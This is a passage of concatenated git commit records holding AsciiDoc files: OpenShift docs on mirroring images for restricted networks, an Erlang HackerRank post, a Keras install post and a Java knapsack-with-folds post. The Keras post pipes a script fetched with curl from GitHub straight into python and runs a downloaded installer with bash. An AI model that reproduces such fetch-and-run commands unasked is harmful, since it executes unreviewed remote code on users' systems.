For example, for the `podman` CLI:\n+\n[source,terminal]\n----\n$ REG_CREDS=${XDG_RUNTIME_DIR}\/containers\/auth.json\n----\n\ninclude::modules\/olm-mirroring-catalog-extracting.adoc[leveloffset=+2]\ninclude::modules\/olm-mirroring-catalog-colocated.adoc[leveloffset=+3]\n.Additional resources\n* xref:..\/operators\/operator_sdk\/osdk-generating-csvs.adoc#olm-arch-os-support_osdk-generating-csvs[Architecture and operating system support for Operators]\n\ninclude::modules\/olm-mirroring-catalog-airgapped.adoc[leveloffset=+3]\n.Additional resources\n* xref:..\/operators\/operator_sdk\/osdk-generating-csvs.adoc#olm-arch-os-support_osdk-generating-csvs[Architecture and operating system support for Operators]\n\ninclude::modules\/olm-mirroring-catalog-manifests.adoc[leveloffset=+2]\ninclude::modules\/olm-mirroring-catalog-post.adoc[leveloffset=+2]\n.Additional resources\n\n* xref:..\/post_installation_configuration\/preparing-for-users.adoc#post-install-mirrored-catalogs[Populating OperatorHub from mirrored Operator catalogs]\n\n[id=\"next-steps_installing-mirroring-installation-images\"]\n== Next steps\n\n\/\/* TODO need to add the registry secret to the machines, which is different\n\n* Install a cluster on infrastructure that you provision in your restricted network, such as on\nxref:..\/installing\/installing_vsphere\/installing-restricted-networks-vsphere.adoc#installing-restricted-networks-vsphere[VMware vSphere],\nxref:..\/installing\/installing_bare_metal\/installing-restricted-networks-bare-metal.adoc#installing-restricted-networks-bare-metal[bare metal], or xref:..\/installing\/installing_aws\/installing-restricted-networks-aws.adoc#installing-restricted-networks-aws[Amazon Web Services].\n\n[id=\"restricted-networks-additional-resources\"]\n== Additional resources\n\n* See xref:..\/support\/gathering-cluster-data.adoc#gathering-data-specific-features_gathering-cluster-data[Gathering data about specific features] for more information about using must-gather.\n","old_contents":"[id=\"installing-mirroring-installation-images\"]\n= Mirroring images for a disconnected installation\ninclude::modules\/common-attributes.adoc[]\n:context: installing-mirroring-installation-images\n\ntoc::[]\n\nBefore you install a cluster on infrastructure that you provision in a restricted network, you must mirror the required container images into that environment. You can also use this procedure in unrestricted networks to ensure your clusters only use container images that have satisfied your organizational controls on external content.\n\n[IMPORTANT]\n====\nYou must have access to the internet to obtain the necessary container images.\nIn this procedure, you place the mirror registry on a mirror host\nthat has access to both your network and the Internet. 
If you do not have access\nto a mirror host, use the disconnected procedure to copy images to a device you\ncan move across network boundaries with.\n====\n\n[id=\"prerequisites_installing-mirroring-installation-images\"]\n== Prerequisites\n\n* You must have a container image registry that supports link:https:\/\/docs.docker.com\/registry\/spec\/manifest-v2-2\/[Docker v2-2] in the location that will host the {product-title} cluster, such as one of the following registries:\n+\n--\n** link:https:\/\/www.redhat.com\/en\/technologies\/cloud-computing\/quay[Red Hat Quay]\n** link:https:\/\/jfrog.com\/artifactory\/[JFrog Artifactory]\n** link:https:\/\/www.sonatype.com\/products\/repository-oss?topnav=true[Sonatype Nexus Repository]\n** link:https:\/\/goharbor.io\/[Harbor]\n--\n+\n[IMPORTANT]\n====\nThe internal registry of the {product-title} cluster cannot be used as the target registry because it does not support pushing without a tag, which is required during the mirroring process.\n====\n\nIf you have an entitlement to Red Hat Quay, see the documentation on deploying Red Hat Quay link:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_quay\/3.5\/html\/deploy_red_hat_quay_for_proof-of-concept_non-production_purposes\/[for proof-of-concept purposes] or link:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_quay\/3.5\/html\/deploy_red_hat_quay_on_openshift_with_the_quay_operator\/[by using the Quay Operator]. If you need additional assistance selecting and installing a registry, contact your sales representative or Red Hat support.\n\ninclude::modules\/installation-about-mirror-registry.adoc[leveloffset=+1]\n\n.Additional information\n\nFor information on viewing the CRI-O logs to view the image source, see xref:..\/installing\/validating-an-installation.html#viewing-the-image-pull-source_validating-an-installation[Viewing the image pull source].\n\n[id=\"installing-preparing-mirror\"]\n== Preparing your mirror host\n\nBefore you perform the mirror procedure, you must prepare the host to retrieve content\nand push it to the remote location.\n\ninclude::modules\/cli-installing-cli.adoc[leveloffset=+2]\n\ninclude::modules\/installation-adding-registry-pull-secret.adoc[leveloffset=+1]\n\n\/\/This command seems out of place. Where should it really go?\n\/\/\/\/\n[id=\"installing-performing-connected-mirror\"]\n== Performing a mirror while connected to the internet\n\n$ oc adm release mirror OPENSHIFT_VERSION --to MIRROR_REPOSITORY\n\/\/\/\/\n\n\/\/\/\/\n[id=\"installing-restricted-networks-preparations-mirroring\"]\n== Mirroring the content\n\nIn production environments, add the required images to a registry in your restricted network. For non-production environments, you can use the images without a separate registry.\n\n modules\/installation-performing-disconnected-mirror.adoc[leveloffset=+2]\n\n modules\/installation-performing-disconnected-mirror-without-registry.adoc[leveloffset=+2]\n\/\/\/\/\n\ninclude::modules\/installation-mirror-repository.adoc[leveloffset=+1]\n\n[id=\"installing-preparing-samples-operator\"]\n== The Cluster Samples Operator in a disconnected environment\n\nIn a disconnected environment, you must take additional steps after you install a cluster to configure the Cluster Samples Operator. 
Review the following information in preparation.\n\ninclude::modules\/installation-images-samples-disconnected-mirroring-assist.adoc[leveloffset=+2]\n\ninclude::modules\/olm-mirroring-catalog.adoc[leveloffset=+1]\n.Additional resources\n\n* xref:..\/operators\/admin\/olm-restricted-networks.adoc#olm-restricted-networks[Using Operator Lifecycle Manager on restricted networks]\n\n[id=\"olm-mirror-catalog-prerequisites_installing-mirroring-installation-images\"]\n=== Prerequisites\n\nMirroring Operator catalogs for use with disconnected clusters has the following prerequisites:\n\n* Workstation with unrestricted network access.\n* `podman` version 1.9.3 or later.\n* If you want to filter, or _prune_, the default catalog and selectively mirror only a subset of Operators, see the following sections:\n** xref:..\/cli_reference\/opm\/cli-opm-install.adoc#cli-opm-install[Installing the opm CLI]\n** xref:..\/operators\/admin\/olm-restricted-networks.adoc#olm-pruning-index-image_olm-restricted-networks[Filtering a SQLite-based index image]\nifndef::openshift-origin[]\n* If you want to mirror a Red Hat-provided catalog, run the following command on your workstation with unrestricted network access to authenticate with `registry.redhat.io`:\n+\n[source,terminal]\n----\n$ podman login registry.redhat.io\n----\nendif::[]\n* Access to a mirror registry that supports\nlink:https:\/\/docs.docker.com\/registry\/spec\/manifest-v2-2\/[Docker v2-2].\n* On your mirror registry, decide which namespace to use for storing mirrored Operator content. For example, you might create an `olm-mirror` namespace.\n* If your mirror registry does not have internet access, connect removable media to your workstation with unrestricted network access.\n* If you are working with private registries, including `registry.redhat.io`, set the `REG_CREDS` environment variable to the file path of your registry credentials for use in later steps. 
For example, for the `podman` CLI:\n+\n[source,terminal]\n----\n$ REG_CREDS=${XDG_RUNTIME_DIR}\/containers\/auth.json\n----\n\ninclude::modules\/olm-mirroring-catalog-extracting.adoc[leveloffset=+2]\ninclude::modules\/olm-mirroring-catalog-colocated.adoc[leveloffset=+3]\n.Additional resources\n* xref:..\/operators\/operator_sdk\/osdk-generating-csvs.adoc#olm-arch-os-support_osdk-generating-csvs[Architecture and operating system support for Operators]\n\ninclude::modules\/olm-mirroring-catalog-airgapped.adoc[leveloffset=+3]\n.Additional resources\n* xref:..\/operators\/operator_sdk\/osdk-generating-csvs.adoc#olm-arch-os-support_osdk-generating-csvs[Architecture and operating system support for Operators]\n\ninclude::modules\/olm-mirroring-catalog-manifests.adoc[leveloffset=+2]\ninclude::modules\/olm-mirroring-catalog-post.adoc[leveloffset=+2]\n.Additional resources\n\n* xref:..\/post_installation_configuration\/preparing-for-users.adoc#post-install-mirrored-catalogs[Populating OperatorHub from mirrored Operator catalogs]\n\n[id=\"next-steps_installing-mirroring-installation-images\"]\n== Next steps\n\n\/\/* TODO need to add the registry secret to the machines, which is different\n\n* Install a cluster on infrastructure that you provision in your restricted network, such as on\nxref:..\/installing\/installing_vsphere\/installing-restricted-networks-vsphere.adoc#installing-restricted-networks-vsphere[VMware vSphere],\nxref:..\/installing\/installing_bare_metal\/installing-restricted-networks-bare-metal.adoc#installing-restricted-networks-bare-metal[bare metal], or xref:..\/installing\/installing_aws\/installing-restricted-networks-aws.adoc#installing-restricted-networks-aws[Amazon Web Services].\n\n[id=\"restricted-networks-additional-resources\"]\n== Additional resources\n\n* See xref:..\/support\/gathering-cluster-data.adoc#gathering-data-specific-features_gathering-cluster-data[Gathering data about specific features] for more information about using must-gather.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"95e872ccdddb7ecf19718c176dd29bc35340876a","subject":"Update 2015-02-21-Writing-Hello-World-N-Times.adoc","message":"Update 2015-02-21-Writing-Hello-World-N-Times.adoc","repos":"hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io","old_file":"_posts\/2015-02-21-Writing-Hello-World-N-Times.adoc","new_file":"_posts\/2015-02-21-Writing-Hello-World-N-Times.adoc","new_contents":"= Writing \"Hello World\" N Times \n:hp-tags: hackerrank, functional programming, Erlang \n\nIn order to learn functional programming and about Concurrency this year I picked http:\/\/www.erlang.org[Erlang]. \n\nI also want to keep solving some problems so that the syntax becomes very familier to me and I found https:\/\/www.hackerrank.com\/domains\/fp\/intro[Hackerrank] has functional programming domain which lets you solve problems. \n\nI will be posting whatever I try and new things I learned. This may be useful to others who are new to Erlang or Functional Programming. \n\npass:[<u>Problem?<\/u>]\n----\nPrint \"Hello World\" N times. The input portion will be handled automatically. You need to write a function with the recommended method signature.\n----\n\nThis sounds extremely simple to me using list comprehensions and it is, but part I was not sure was how to read from standard input and write to standard output in Erlang. 
\n\nAfter some Google searches, I found the exact same question on http:\/\/stackoverflow.com\/a\/10873293\/379235[StackOverflow].\n\nI found out that I needed to know about http:\/\/erldocs.com\/current\/stdlib\/io.html?i=0&search=io:fr#fread\/2[fread] and http:\/\/erldocs.com\/current\/stdlib\/io.html?i=0&search=io:fwr#fwrite\/1[fwrite]. That was it. \n\n\npass:[<u>My Solution<\/u>]\n\n[source,erlang]\n-----\n-module(hr).\n-author(\"harith\").\n\n-export([main\/0]).\n\nmain() ->\n {ok, [N]} = io:fread(\"\", \"~d\"),\n hello(N).\n\nhello(N) when N >= 0, N =< 50 ->\n [io:format(\"Hello World~n\") || _I <- lists:seq(1,N)].\n----- \n\n\nLet me know if you have a better way of doing this.","old_contents":"= Writing \"Hello World\" N Times \n:hp-tags: hackerrank, functional programming, Erlang \n\nIn order to learn functional programming and about Concurrency this year I picked http:\/\/www.erlang.org[Erlang]. \n\nI also want to keep solving some problems so that the syntax becomes very familier to me and I found https:\/\/www.hackerrank.com\/domains\/fp\/intro[Hackerrank] has functional programming domain which lets you solve problems. \n\nI will be posting whatever I try and new things I learned. This may be useful to others who are new to Erlang or Functional Programming. \n\npass:[<u>Problem?<\/u>]\n----\nPrint \"Hello World\" N times. The input portion will be handled automatically. You need to write a function with the recommended method signature.\n----\n\nThis sounds extremely simple to me using list comprehensions and it is, but part I was not sure was how to read from standard input and write to standard output in Erlang. \n\nAfter some google searches, I found exact same question on http:\/\/stackoverflow.com\/a\/10873293\/379235[StackOverflow].\n\nI found out that I need to know about http:\/\/erldocs.com\/current\/stdlib\/io.html?i=0&search=io:fr#fread\/2[fread] and http:\/\/erldocs.com\/current\/stdlib\/io.html?i=0&search=io:fwr#fwrite\/1[fwrite]. That was it. \n\n\npass:[<u>My Solution<\/u>]\n\n[source,erlang]\n-----\n-module(hr).\n-author(\"harith\").\n\n-export([main\/0]).\n\nmain() ->\n {ok, [N]} = io:fread(\">\", \"~d\"),\n hello(N).\n\nhello(N) when N >= 0, N =< 50 ->\n [io:format(\"Hello World~n\") || _I <- lists:seq(1,N)].\n----- \n\n\nLet me know if you have a better way of doing this.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"57c7f3afebcf170a1e84ab73d90e351d55e9b6f7","subject":"Update 2015-11-10-Visual-Question-Answering-2.adoc","message":"Update 2015-11-10-Visual-Question-Answering-2.adoc","repos":"gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io","old_file":"_posts\/2015-11-10-Visual-Question-Answering-2.adoc","new_file":"_posts\/2015-11-10-Visual-Question-Answering-2.adoc","new_contents":"= Visual Question Answering 2\n:hp-tags: VQA, DNN, RNN, CNN, Python, Keras, Theano\n\n\nPrepare for VQA in Ubuntu 14.04 x64. +\nIn this post, I want to install and test Keras. +\n\n\n[quote, Keras Documentation, ]\n____\nKeras is a minimalist, highly modular neural network library in the spirit of Torch, written in Python, that uses Theano under the hood for optimized tensor manipulation on GPU and CPU. It was developed with a focus on enabling fast experimentation.\n____\n \n{empty} +\n\nKeras uses the following dependencies: +\n\n. *numpy*\n. *scipy*\n. *pyyaml*\n. *Theano*\n. *HDF5* and *h5py* (optional, required if you use model saving\/loading functions)\n. 
Optional but recommended if you use CNNs: *cuDNN*\n\n=== Install miniconda\n\n[source,role=\"console\"]\n----\n$ wget https:\/\/repo.continuum.io\/miniconda\/Miniconda-latest-Linux-`uname -p`.sh\n$ bash Miniconda-latest-Linux-`uname -p`.sh\n$ source ~\/.bashrc\n----\nSee also link:http:\/\/conda.pydata.org\/docs\/install\/quick.html[the install guide].\n\n=== Install Theano\n\n[source,role=\"console\"]\n----\n$ sudo apt-get install git python-pip\n$ pip install git+git:\/\/github.com\/Theano\/Theano.git\n----\n\n=== Install h5py\n\n[source,role=\"console\"]\n----\n$ conda install -y h5py\n----\n\n=== Install Keras\n\n[source,role=\"console\"]\n----\n$ pip install keras\n----\n\n=== Install g++ (optional)\n\n[source,role=\"console\"]\n----\n$ sudo apt-get install g++\n----\n\nWithout g++, you will get this message when run Keras and Keras will be very slow.\n\n[source,role=\"console\"]\n----\nWARNING (theano.configdefaults): g++ not detected ! Theano will be unable to execute optimized C-implementations (for both CPU and GPU) and will default to Python implementations. Performance will be severely degraded. To remove this warning, set Theano flags cxx to an empty string.\n----\n\n=== Test Keras\n\n[source,role=\"console\"]\n----\n$ curl -sSL https:\/\/github.com\/fchollet\/keras\/raw\/master\/examples\/mnist_mlp.py | python\n----\n\nThe result here.\n\n[source,role=\"console\"]\n----\n60000 train samples\n10000 test samples\nTrain on 60000 samples, validate on 10000 samples\nEpoch 1\/20\n8s - loss: 0.4356 - acc: 0.8716 - val_loss: 0.1863 - val_acc: 0.9421\nEpoch 2\/20\n7s - loss: 0.1961 - acc: 0.9414 - val_loss: 0.1274 - val_acc: 0.9601\nEpoch 3\/20\n7s - loss: 0.1451 - acc: 0.9564 - val_loss: 0.1010 - val_acc: 0.9691\nEpoch 4\/20\n8s - loss: 0.1189 - acc: 0.9642 - val_loss: 0.0847 - val_acc: 0.9752\nEpoch 5\/20\n8s - loss: 0.1019 - acc: 0.9691 - val_loss: 0.0850 - val_acc: 0.9735\nEpoch 6\/20\n8s - loss: 0.0903 - acc: 0.9721 - val_loss: 0.0749 - val_acc: 0.9777\nEpoch 7\/20\n8s - loss: 0.0822 - acc: 0.9745 - val_loss: 0.0753 - val_acc: 0.9762\nEpoch 8\/20\n7s - loss: 0.0758 - acc: 0.9762 - val_loss: 0.0743 - val_acc: 0.9796\nEpoch 9\/20\n7s - loss: 0.0705 - acc: 0.9780 - val_loss: 0.0720 - val_acc: 0.9784\nEpoch 10\/20\n8s - loss: 0.0648 - acc: 0.9790 - val_loss: 0.0688 - val_acc: 0.9793\nEpoch 11\/20\n8s - loss: 0.0592 - acc: 0.9819 - val_loss: 0.0663 - val_acc: 0.9797\nEpoch 12\/20\n8s - loss: 0.0567 - acc: 0.9824 - val_loss: 0.0677 - val_acc: 0.9815\nEpoch 13\/20\n8s - loss: 0.0536 - acc: 0.9833 - val_loss: 0.0711 - val_acc: 0.9796\nEpoch 14\/20\n8s - loss: 0.0520 - acc: 0.9834 - val_loss: 0.0684 - val_acc: 0.9806\nEpoch 15\/20\n9s - loss: 0.0500 - acc: 0.9837 - val_loss: 0.0664 - val_acc: 0.9807\nEpoch 16\/20\n7s - loss: 0.0471 - acc: 0.9850 - val_loss: 0.0683 - val_acc: 0.9809\nEpoch 17\/20\n7s - loss: 0.0449 - acc: 0.9856 - val_loss: 0.0682 - val_acc: 0.9812\nEpoch 18\/20\n8s - loss: 0.0433 - acc: 0.9860 - val_loss: 0.0675 - val_acc: 0.9813\nEpoch 19\/20\n7s - loss: 0.0401 - acc: 0.9869 - val_loss: 0.0683 - val_acc: 0.9819\nEpoch 20\/20\n8s - loss: 0.0383 - acc: 0.9874 - val_loss: 0.0705 - val_acc: 0.9820\nTest score: 0.0704572771238\nTest accuracy: 0.982\n----\n\n{empty} +\n{empty} +\n\n.Error\n[NOTE]\n****\n\nWhen I installed Theano from miniconda, \n\n[source,role=\"console\"]\n----\n$ conda install -y theano\n----\n\n* keras-0.2.0\n* theano-0.7.0\n\ngot this error during th test. 
\n\n[source,role=\"console\"]\n----\nAttributeError: 'module' object has no attribute 'relu'\n----\n\nI solved the error by re-installing with pip from github. +\n\n[source,role=\"console\"]\n----\n$ conda uninstall theano\n$ sudo apt-get install git\n$ pip install git+git:\/\/github.com\/Theano\/Theano.git\n----\n\n****\n\n{empty} +\n{empty} +\n\n''''\n\n=== References\n\n* http:\/\/ermaker.github.io\/blog\/2015\/09\/08\/get-started-with-keras-for-beginners.html\n* http:\/\/keras.io\/\n* http:\/\/conda.pydata.org\/docs\/install\/quick.html\n\n''''","old_contents":"= Visual Question Answering 2\n:hp-tags: VQA, DNN, RNN, CNN, Python, Keras, Theano\n\n\nPrepare for VQA in Ubuntu 14.04 x64. +\nIn this Post, I want to install and test Keras. +\n\n\n[quote, Keras Documentation, ]\n____\nKeras is a minimalist, highly modular neural network library in the spirit of Torch, written in Python, that uses Theano under the hood for optimized tensor manipulation on GPU and CPU. It was developed with a focus on enabling fast experimentation.\n____\n \n{empty} +\n\nKeras uses the following dependencies: +\n\n. *numpy*\n. *scipy*\n. *pyyaml*\n. *Theano*\n. *HDF5* and *h5py* (optional, required if you use model saving\/loading functions)\n. Optional but recommended if you use CNNs: *cuDNN*\n\n=== Install miniconda\n\n[source,role=\"console\"]\n----\n$ wget https:\/\/repo.continuum.io\/miniconda\/Miniconda-latest-Linux-`uname -p`.sh\n$ bash Miniconda-latest-Linux-`uname -p`.sh\n$ source ~\/.bashrc\n----\nSee also link:http:\/\/conda.pydata.org\/docs\/install\/quick.html[the install guide].\n\n=== Install Theano\n\n[source,role=\"console\"]\n----\n$ sudo apt-get install git\n$ pip install git+git:\/\/github.com\/Theano\/Theano.git\n----\n\n=== Install h5py\n\n[source,role=\"console\"]\n----\n$ conda install -y h5py\n----\n\n=== Install Keras\n\n[source,role=\"console\"]\n----\n$ pip install keras\n----\n\n=== Install g++ (optional)\n\n[source,role=\"console\"]\n----\n$ sudo apt-get install g++\n----\n\nWithout g++, you will get this message when run Keras and Keras will be very slow.\n\n[source,role=\"console\"]\n----\nWARNING (theano.configdefaults): g++ not detected ! Theano will be unable to execute optimized C-implementations (for both CPU and GPU) and will default to Python implementations. Performance will be severely degraded. 
To remove this warning, set Theano flags cxx to an empty string.\n----\n\n=== Test Keras\n\n[source,role=\"console\"]\n----\n$ curl -sSL https:\/\/github.com\/fchollet\/keras\/raw\/master\/examples\/mnist_mlp.py | python\n----\n\nThe result here.\n\n[source,role=\"console\"]\n----\n60000 train samples\n10000 test samples\nTrain on 60000 samples, validate on 10000 samples\nEpoch 1\/20\n8s - loss: 0.4356 - acc: 0.8716 - val_loss: 0.1863 - val_acc: 0.9421\nEpoch 2\/20\n7s - loss: 0.1961 - acc: 0.9414 - val_loss: 0.1274 - val_acc: 0.9601\nEpoch 3\/20\n7s - loss: 0.1451 - acc: 0.9564 - val_loss: 0.1010 - val_acc: 0.9691\nEpoch 4\/20\n8s - loss: 0.1189 - acc: 0.9642 - val_loss: 0.0847 - val_acc: 0.9752\nEpoch 5\/20\n8s - loss: 0.1019 - acc: 0.9691 - val_loss: 0.0850 - val_acc: 0.9735\nEpoch 6\/20\n8s - loss: 0.0903 - acc: 0.9721 - val_loss: 0.0749 - val_acc: 0.9777\nEpoch 7\/20\n8s - loss: 0.0822 - acc: 0.9745 - val_loss: 0.0753 - val_acc: 0.9762\nEpoch 8\/20\n7s - loss: 0.0758 - acc: 0.9762 - val_loss: 0.0743 - val_acc: 0.9796\nEpoch 9\/20\n7s - loss: 0.0705 - acc: 0.9780 - val_loss: 0.0720 - val_acc: 0.9784\nEpoch 10\/20\n8s - loss: 0.0648 - acc: 0.9790 - val_loss: 0.0688 - val_acc: 0.9793\nEpoch 11\/20\n8s - loss: 0.0592 - acc: 0.9819 - val_loss: 0.0663 - val_acc: 0.9797\nEpoch 12\/20\n8s - loss: 0.0567 - acc: 0.9824 - val_loss: 0.0677 - val_acc: 0.9815\nEpoch 13\/20\n8s - loss: 0.0536 - acc: 0.9833 - val_loss: 0.0711 - val_acc: 0.9796\nEpoch 14\/20\n8s - loss: 0.0520 - acc: 0.9834 - val_loss: 0.0684 - val_acc: 0.9806\nEpoch 15\/20\n9s - loss: 0.0500 - acc: 0.9837 - val_loss: 0.0664 - val_acc: 0.9807\nEpoch 16\/20\n7s - loss: 0.0471 - acc: 0.9850 - val_loss: 0.0683 - val_acc: 0.9809\nEpoch 17\/20\n7s - loss: 0.0449 - acc: 0.9856 - val_loss: 0.0682 - val_acc: 0.9812\nEpoch 18\/20\n8s - loss: 0.0433 - acc: 0.9860 - val_loss: 0.0675 - val_acc: 0.9813\nEpoch 19\/20\n7s - loss: 0.0401 - acc: 0.9869 - val_loss: 0.0683 - val_acc: 0.9819\nEpoch 20\/20\n8s - loss: 0.0383 - acc: 0.9874 - val_loss: 0.0705 - val_acc: 0.9820\nTest score: 0.0704572771238\nTest accuracy: 0.982\n----\n\n{empty} +\n{empty} +\n\n.Error\n[NOTE]\n****\n\nWhen I installed Theano from miniconda, \n\n[source,role=\"console\"]\n----\n$ conda install -y theano\n----\n\n* keras-0.2.0\n* theano-0.7.0\n\ngot this error during th test. \n\n[source,role=\"console\"]\n----\nAttributeError: 'module' object has no attribute 'relu'\n----\n\nI solved the error by re-installing with pip from github. 
+\n\n[source,role=\"console\"]\n----\n$ conda uninstall theano\n$ sudo apt-get install git\n$ pip install git+git:\/\/github.com\/Theano\/Theano.git\n----\n\n****\n\n{empty} +\n{empty} +\n\n''''\n\n=== References\n\n* http:\/\/ermaker.github.io\/blog\/2015\/09\/08\/get-started-with-keras-for-beginners.html\n* http:\/\/keras.io\/\n* http:\/\/conda.pydata.org\/docs\/install\/quick.html\n\n''''","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f5c7770a681984e5dc2afbc7b297c5def75cc4fa","subject":"Update 2016-06-11-Folding-the-Universe-part-I.adoc","message":"Update 2016-06-11-Folding-the-Universe-part-I.adoc","repos":"pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io","old_file":"_posts\/2016-06-11-Folding-the-Universe-part-I.adoc","new_file":"_posts\/2016-06-11-Folding-the-Universe-part-I.adoc","new_contents":"= Folding the Universe, part I\n:published_at: 2016-06-11\n\nFolding the Universe is actually the title of a book by Peter Engel which is subtitled \"Origami From Angelfish to Zen\", suggesting that anything in the universe may be modelled out of folded paper. The analogy with computer programming is interesting since, in functional programming, nearly every problem can be solved with folds.\n\nComputer programming is primarily about abstraction. Instead of doing the same basic tasks again and again, we write programs once to perform these tasks, and we can then build larger programs by composing these basic tasks. Probably one difference between functional and imperative programmers is the way they handle task abstractions. Most often, imperative programmers start thinking about abstracting subtasks when they realize that they are repeatedly writing the same code. But the depth of abstraction is often kept quite minimal. The main reason is that higher level abstractions are generally provided by the language. Arithmetic operations on integers, for example, are provided by nearly all programming languages, so there is no need to write specific code to abstract them (although it is possible, and an interesting challenge!).\n\nLoops are another kind of abstraction that is provided by many languages. Most imperative programmers would not believe that there exist programming languages without loops. Is it possible to program without loops? Of course, it is. It is even possible to program with absolutely no control structures.\n\nMaybe you think that it is possible only in some very specific languages specially designed for this. Nothing could be more wrong. Take Java, for example. It is perfectly possible to write any program without ever using a for loop, a while loop, a switch case selector, or even an if..else construct. You don't believe it? Read on.\n\nNot only can you write Java programs without any control structure, but you can also completely avoid variables. Is this useful? Well, avoiding variables is indeed very useful to write safer concurrent programs since it frees us from all concurrency problems, such as deadlocks, livelocks, stale data, races, corruption and more. But it is also safer for non concurrent programs since you can confidently reuse data knowing that it will not have been altered.\n\nAvoiding control structures also brings many advantages, but it is more difficult to make it evident. Evidence comes with usage. But in all cases, it is a very rewarding challenge. 
So why not give it a try?\n\nWarning: If you are the kind of programmer who think in terms of best practices, design patterns, productivity through the use of multiple libraries, or if you have ever thought that \"this is not the way Java (or anything else) has been intended to be used\", or if you think that we should never try to reinvent the wheel, you should probably not continue reading. (By the way, if the wheel had not been reinvented many times, it would still be circular and spinning around its center, so there would be no cars, no trains, nor anything else using modern wheels, but this is another story.)\n\n== The challenge\n\nThe challenge is to solve a well known computer problem while using no variables (only constants) and no control structures. We can create classes and methods, we can use the arithmetic operations and comparisons. We could do without, but we would have to design a whole number system with operators, based on folds, which is perfectly feasible, but a bit cumbersome. We will use Java 8 `Function` and `BiFunction`, because creating ours would be a waste of time (but minimal, since this would need only three lines of code each).\n\nThe problem to solve is known as the _Knapsack problem_. Basically, it consists in packing a knapsack with items in the best possible manner. The knapsack has a maximum capacity, and each item has a name, a weight and a value. The goal is to pack the maximum value in the knapsack without exceeding its capacity. If you want to get an idea of how to solve this in a traditional imperative manner in Java, you can look at this example: https:\/\/rosettacode.org\/wiki\/Knapsack_problem\/0-1#Java[Knapsack problem\/0-1]. I strongly encourage you to look at the example to have an idea of how this problem may be solved in imperative style in just 300 lines of (non reusable) code.\n\n== How to handle the problem\n\nFirst, we will define the business objects. The first thing we will need is a class to represent items. It will be a very basic class:\n\n[source,java]\n----\npublic class Item {\n public final String name;\n public final int weight;\n public final double value;\n\n public Item(String name, int weight, double value) {\n this.name = name;\n this.weight = weight;\n this.value = value;\n }\n\n public String toString() {\n return String.format(\"item(%s, %s, %s)\", name, weight, value);\n }\n}\n----\n\nIf you don't like public fields, feel free to make them private and write the corresponding getters. It is absolutely useless, however, just making the code longer. The `toString` method is for convenience, in order to print the result. In fact, there is absolutely no logic in this class.\n\nThen, we need a class to represent the knapsack:\n\n[source,java]\n----\npublic class Knapsack {\n\n private final List<Item> items;\n private final double value;\n private final int weight;\n private final int available;\n\n private Knapsack(double value, List<Item> items, int weight, int available) {\n this.value = value;\n this.items = items;\n this.weight = weight;\n this.available = available;\n }\n\n private Knapsack add(Item item) {\n return new Knapsack(this.value + item.value, this.items.cons(item), this.weight + item.weight, this.available - item.weight);\n }\n\n private boolean canAccept(Item item) {\n return item.weight <= this.available;\n }\n\n private Knapsack maxValue(Knapsack that) {\n return this.value >= that.value ? 
this : that;\n }\n\n public String toString() {\n return String.format(\"Total value: %s\\nTotal weight: %s\\nItems:\\n%s\",\n value, weight, items.foldRight(\"\",\n (item, string) -> String.format(\"\\t%s\\n%s\", item, string)));\n }\n\n private static Knapsack empty(int capacity) {\n return new Knapsack(0.0, List.list(), 0, capacity);\n }\n\n private static Knapsack pack(List<Item> items, Knapsack knapsack) {\n ...\n }\n\n public static Knapsack pack(List<Item> items, int knapsackCapacity) {\n return pack(items, empty(knapsackCapacity));\n }\n}\n----\n\nAs you can see, a `Knapsack` has four properties: a list of items, a value, a weight, and an available capacity, meaning how much weight can be added before the knapsack is full. The `value` and `weight` fields are for convenience and optimization. We could compute them each time we need them, but it would waste time. They are used for memoization of the weight an value, which trades times against memory space.\n\nThe constructor is private, and we have only one factory method called `empty` that creates an empty knapsack. Adding an item to the knapsack is done through the `add` method, which does not mutate anything but creates and returns a new `Knapsack` with the updated value. You might argue that the `List<Item>` is mutated, but it is not, because it is not a Java `List`. More on this later.\n\nThere are three utility methods: `canAccept(Item)` allows knowing if the knapsack has enough available capacity to receive a given item. The `maxValue` method compares two `Knapsack` instances and returns the one with the greatest value. The `toString` method, of course, returns a readable representation of the knapsack.\n\nThe interesting part is the `pack` method, which takes a list of items and a `Knapsack` and returns the `Knapsack` (in fact a new one) with as much value as possible packed into it. Plus, there is a convenience `pack` method taking a list of items and a capacity.\n\nBefore looking at the core of the problem (the `pack` method), lets see how this program will be used:\n\n[source,java]\n----\n public static void main(String... args) {\n\n int capacity = 400;\n\n final List<Item> items = List.<Item>list()\n .cons(new Item(\"map\", 9, 150.0))\n .cons(new Item(\"compass\", 13, 35.0))\n .cons(new Item(\"water\", 153, 200.0))\n .cons(new Item(\"sandwich\", 50, 160.0))\n .cons(new Item(\"glucose\", 15, 60.0))\n .cons(new Item(\"tin\", 68, 45.0))\n .cons(new Item(\"banana\", 27, 60.0))\n .cons(new Item(\"apple\", 39, 40.0))\n .cons(new Item(\"cheese\", 23, 30.0))\n .cons(new Item(\"beer\", 52, 10.0))\n .cons(new Item(\"cream\", 11, 70.0))\n .cons(new Item(\"camera\", 32, 30.0))\n .cons(new Item(\"tshirt\", 24, 15.0))\n .cons(new Item(\"trousers\", 48, 10.0))\n .cons(new Item(\"umbrella\", 73, 40.0))\n .cons(new Item(\"trousers\", 42, 70.0))\n .cons(new Item(\"overclothes\", 43, 75.0))\n .cons(new Item(\"notecase\", 22, 80.0))\n .cons(new Item(\"sunglasses\", 7, 20.0))\n .cons(new Item(\"towel\", 18, 12.0))\n .cons(new Item(\"socks\", 4, 50.0))\n .cons(new Item(\"book\", 30, 10.0));\n\n System.out.println(Knapsack.pack(items, capacity));\n }\n}\n----\n\nAs you can see, it is very simple, although the way the list is constructed may look a bit weird. As said earlier, this is not a Java `List`, but a functional singly linked list. It is represented by an abstract `List` class and two internal subclasses, `Nil` and `Cons` representing the empty and non empty lists. 
